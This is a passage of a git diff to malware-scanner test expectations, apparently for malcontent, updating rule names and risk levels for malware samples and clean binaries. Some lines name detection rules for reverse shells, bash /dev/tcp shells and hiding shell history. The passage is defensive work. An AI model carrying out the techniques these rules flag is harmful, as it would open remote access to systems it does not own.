discover/process/effective_groupid_get: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low discover/user/USER: low diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md index 2c6aa011c..435fce245 100644 --- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md +++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md @@ -1,8 +1,7 @@ ## linux/2022.bpfdoor/2023.ConnectBack/tiny [😈 CRITICAL] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| -| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | -| HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | | -| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|----------|----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| +| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | +| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md index 57f5fa934..082d8ea1a 100644 --- a/tests/linux/2023.ConnectBack/tiny.md +++ b/tests/linux/2023.ConnectBack/tiny.md @@ -1,8 +1,7 @@ ## linux/2023.ConnectBack/tiny [😈 CRITICAL] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| -| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | -| HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | | -| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|----------|----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| +| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | +| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple index 7e125dabc..1d1bb23b2 100644 --- a/tests/linux/2023.Kinsing/install.sh.simple +++ b/tests/linux/2023.Kinsing/install.sh.simple @@ -21,8 +21,8 @@ evasion/bypass_security/linux/se_disable: high evasion/bypass_security/linux/ufw: medium evasion/file/location/dev_shm: critical evasion/file/location/var_tmp: medium -evasion/file/prefix: high evasion/file/prefix/dev: critical +evasion/file/prefix/tmp: high evasion/hijack_execution/etc_ld.so.preload: high evasion/logging/syslog: medium evasion/mimicry/fake_process: critical diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index 1e8293eaa..71b80807d 100644 --- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -59,7 +59,7 @@ net/dns: low net/dns/servers: low net/dns/txt: low net/download: medium -net/download/fetch: medium +net/download/fetch: high net/http/2: low net/http/accept_encoding: low net/http/auth: low diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple index 2765835ac..695a98f23 100644 --- a/tests/linux/2024.gas/gas.simple +++ b/tests/linux/2024.gas/gas.simple @@ -2,6 +2,7 @@ anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium discover/system/cpu_info: low +discover/system/dev_full: medium discover/system/platform: low discover/system/sysinfo: medium evasion/hijack_execution/LD_LIBRARY_PATH: low @@ -25,9 +26,7 @@ fs/proc/sys_kernel_osrelease: medium fs/tempdir: low fs/tempdir/TMPDIR: low hw/cpu: medium -impact/exploit/GCONV_PATH: low impact/remote_access/dl_iterate: high -impact/remote_access/reverse_shell: medium net/socket/send: low net/url/embedded: low process/create: low diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json index 3f5fcee65..6df73c88c 100644 --- a/tests/linux/2024.kubo_injector/injector.json +++ b/tests/linux/2024.kubo_injector/injector.json @@ -89,17 +89,6 @@ "ID": "fs/proc/arbitrary_pid", "RuleName": "proc_arbitrary" }, - { - "Description": "accesses underlying executable of other processes", - "MatchStrings": [ - "/proc/%s/exe" - ], - "RiskScore": 3, - "RiskLevel": "HIGH", - "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-exe.yara#proc_s_exe", - "ID": "fs/proc/pid_exe", - "RuleName": "proc_s_exe" - }, { "Description": "access process memory maps", "MatchStrings": [ diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple index 0c30336b6..bd35f027d 100644 --- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -42,8 +42,8 @@ discover/user/USER: low discover/user/name_get: medium evasion/file/location/chdir_unusual: medium evasion/file/location/dev_shm: medium -evasion/file/prefix: high evasion/file/prefix/dev: critical +evasion/file/prefix/tmp: high evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/logging/current_logins: medium evasion/logging/hide_shell_history: high diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple index 4950c2eed..3cbd303b1 100644 --- a/tests/linux/2024.kworker_pretenders/gafgyt.simple +++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple @@ -1,7 +1,7 @@ # linux/2024.kworker_pretenders/gafgyt: critical 3P/elastic/mirai: critical 3P/threat_hunting/base64: medium -anti-static/packer/elf: high +anti-static/elf/content: high credential/ssh/d: medium data/base64/external: medium data/encoding/base64: low diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple index 3c878f390..bac6337eb 100644 --- a/tests/linux/2024.medusa/rkload.simple +++ b/tests/linux/2024.medusa/rkload.simple @@ -5,6 +5,7 @@ anti-behavior/LD_PROFILE: medium anti-static/xor/commands: high credential/ssh/d: medium discover/system/cpu_info: low +discover/system/dev_full: medium discover/system/sysinfo: medium evasion/file/location/dev_shm: high evasion/file/location/lib: high @@ -39,8 +40,6 @@ fs/proc/stat: medium fs/tempdir: low fs/tempdir/TMPDIR: low hw/cpu: medium -impact/exploit/GCONV_PATH: low -impact/remote_access/reverse_shell: medium malware/family/medusa: critical net/socket/local_addr: low net/socket/send: low diff --git a/tests/linux/2024.sbcl.market/sbcl.sdiff b/tests/linux/2024.sbcl.market/sbcl.sdiff index 08e466ca4..502e9857c 100644 --- a/tests/linux/2024.sbcl.market/sbcl.sdiff +++ b/tests/linux/2024.sbcl.market/sbcl.sdiff @@ -17,10 +17,10 @@ -fs/permission/modify -fs/proc/self_exe -fs/symlink_resolve +-hw/dev/ubi -net/url/embedded ++++ added: sbcl.dirty +anti-static/elf/entropy -+anti-static/packer/high_entropy +data/compression/zstd +data/embedded/zstd +discover/user/HOME diff --git a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple index 2b97f9fd3..4d90726f1 100644 --- a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple +++ b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple @@ -1,7 +1,7 @@ # linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: critical +anti-static/elf/content: high anti-static/elf/entropy: high -anti-static/packer/elf: high -anti-static/packer/high_entropy: medium +anti-static/elf/header: high anti-static/packer/upx: high c2/addr/ip: high credential/sniffer/bpf: medium diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md index 0b0edb9e0..08b10ab08 100644 --- a/tests/linux/UPX/06ed158.md +++ b/tests/linux/UPX/06ed158.md @@ -1,11 +1,11 @@ ## linux/UPX/06ed158 [😈 CRITICAL] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|-------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| -| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_2) | high entropy ELF binary (>7.4) | | -| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | -| HIGH | [anti-static/packer/high_entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/high_entropy.yara#high_entropy_7_9) | high entropy binary (>7.9) | | -| HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | -| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | -| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|--------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| +| HIGH | [anti-static/elf/content](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/content.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | +| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_4) | high entropy ELF binary (>7.4) | | +| HIGH | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#high_entropy_header) | high entropy ELF header (>7) | | +| HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | +| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | +| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple index 5a9782f48..08541cf86 100644 --- a/tests/linux/clean/appsec-rules.json.simple +++ b/tests/linux/clean/appsec-rules.json.simple @@ -19,7 +19,7 @@ data/compression/bzip2: low data/compression/lzma: low data/compression/zstd: low data/encoding/base64: low -discover/system/network: high +discover/system/network: medium discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium @@ -28,7 +28,6 @@ evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low -exec/shell/bash_dev_tcp: high exec/shell/bash_dev_udp: medium exec/shell/nohup: medium exec/system_controls/apparmor: medium @@ -54,6 +53,7 @@ impact/exploit/cve: medium impact/remote_access/iptables: medium net/dns/servers: low net/download: medium +net/ftp/t: low net/http/cookies: medium net/socket/connect: medium net/tcp/sftp: medium diff --git a/tests/linux/clean/busybox.simple b/tests/linux/clean/busybox.simple index 19b37a061..37746918e 100644 --- a/tests/linux/clean/busybox.simple +++ b/tests/linux/clean/busybox.simple @@ -10,7 +10,7 @@ data/random/insecure: low discover/group/lookup: medium discover/network/interface_get: low discover/network/netstat: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/processes/pgrep: medium discover/system/cpu_info: low discover/system/platform: low diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple index 9970d0eed..15ad1c190 100644 --- a/tests/linux/clean/caddy.simple +++ b/tests/linux/clean/caddy.simple @@ -38,7 +38,7 @@ discover/cloud/aws_metadata: low discover/cloud/google_metadata: low discover/group/lookup: medium discover/network/mac_address: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: medium diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple index b0c8a3db3..25f8dd578 100644 --- a/tests/linux/clean/chezmoi.simple +++ b/tests/linux/clean/chezmoi.simple @@ -46,7 +46,7 @@ data/hash/md5: low data/random/insecure: low discover/group/lookup: medium discover/network/mac_address: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple index bbd2dfbff..f6058f27e 100644 --- a/tests/linux/clean/chrome.simple +++ b/tests/linux/clean/chrome.simple @@ -6,9 +6,9 @@ anti-behavior/LD_PROFILE: medium anti-static/obfuscation/obfuscate: low c2/addr/http_dynamic: medium c2/addr/ip: medium +c2/addr/server: medium c2/discovery/ip_dns_resolver: medium c2/refs: medium -c2/server_address: medium c2/tool_transfer/dropper: medium collect/archives/zip: medium collect/databases/leveldb: medium @@ -38,8 +38,8 @@ data/hash/sha1: low data/random/insecure: low discover/network/interface_list: medium discover/network/mac_address: medium -discover/process/name_get: medium -discover/process/parent_pid_get: low +discover/process/name: medium +discover/process/parent: low discover/process/runtime_deps: medium discover/processes/list: medium discover/system/hostname_get: low @@ -112,7 +112,6 @@ fs/watch: low hw/cpu: medium hw/dev/block_ice: medium hw/wireless: low -impact/exploit/GCONV_PATH: low impact/ransom/decryptor: medium impact/remote_access/heartbeat: medium lateral/scan/target_ip: medium diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple index 4868ecd1d..f2ee677c1 100644 --- a/tests/linux/clean/clickhouse.simple +++ b/tests/linux/clean/clickhouse.simple @@ -6,8 +6,8 @@ anti-static/obfuscation/obfuscate: low c2/addr/http_dynamic: medium c2/addr/ip: medium +c2/addr/server: medium c2/discovery/dyndns: medium -c2/server_address: medium c2/tool_transfer/download: medium c2/tool_transfer/grayware: high collect/databases/leveldb: medium @@ -45,7 +45,7 @@ discover/cloud/google_metadata: low discover/network/interface_get: low discover/network/interface_list: medium discover/permissions/capabilities: medium -discover/process/name_get: medium +discover/process/name: medium discover/process/runtime_deps: medium discover/processes/list: medium discover/system/cpu_info: low diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md index eede9cc16..7ca00157c 100644 --- a/tests/linux/clean/code-oss.md +++ b/tests/linux/clean/code-oss.md @@ -11,9 +11,9 @@ | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[bIp](https://github.com/search?q=bIp&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[gIp](https://github.com/search?q=gIp&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[maxPort](https://github.com/search?q=maxPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[minPort](https://github.com/search?q=minPort&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[oIp](https://github.com/search?q=oIp&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_ip](https://github.com/search?q=quic_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) | -| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [_quic_drop_packets_with_changed_server_address](https://github.com/search?q=_quic_drop_packets_with_changed_server_address&type=code)
[server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [dropper](https://github.com/search?q=dropper&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | | MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEH](https://github.com/search?q=LevelDBEH&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBLeveledLock](https://github.com/search?q=LevelDBLeveledLock&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKeyRange](https://github.com/search?q=LevelDBScopesKeyRange&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_factory](https://github.com/search?q=leveldb_factory&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) | @@ -26,7 +26,7 @@ | MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[h0dHBzOi8v::$https](https://github.com/search?q=h0dHBzOi8v%3A%3A%24https&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | -| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | @@ -104,7 +104,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | -| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | @@ -139,7 +139,6 @@ | LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [mkdtemp](https://github.com/search?q=mkdtemp&type=code)
[temp dir](https://github.com/search?q=temp+dir&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code) | -| LOW | [impact/exploit/GCONV_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/GCONV_PATH.yara#gconv_path) | references character conversion configuration | [GCONV_PATH](https://github.com/search?q=GCONV_PATH&type=code) | | LOW | [impact/ui/screen_capture](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ui/screen-capture.yara#macos_screen_capture) | macos screen capture | [captureScreen](https://github.com/search?q=captureScreen&type=code) | | LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) | | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) | diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple index aa2a81b85..216e3c50b 100644 --- a/tests/linux/clean/containerd.simple +++ b/tests/linux/clean/containerd.simple @@ -2,7 +2,7 @@ 3P/threat_hunting/hijacker: medium 3P/threat_hunting/privilegeescalation: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium collect/archives/zip: medium collect/databases/mysql: medium credential/password: low diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple index 0b0bb693b..da8770463 100644 --- a/tests/linux/clean/default_config.json.simple +++ 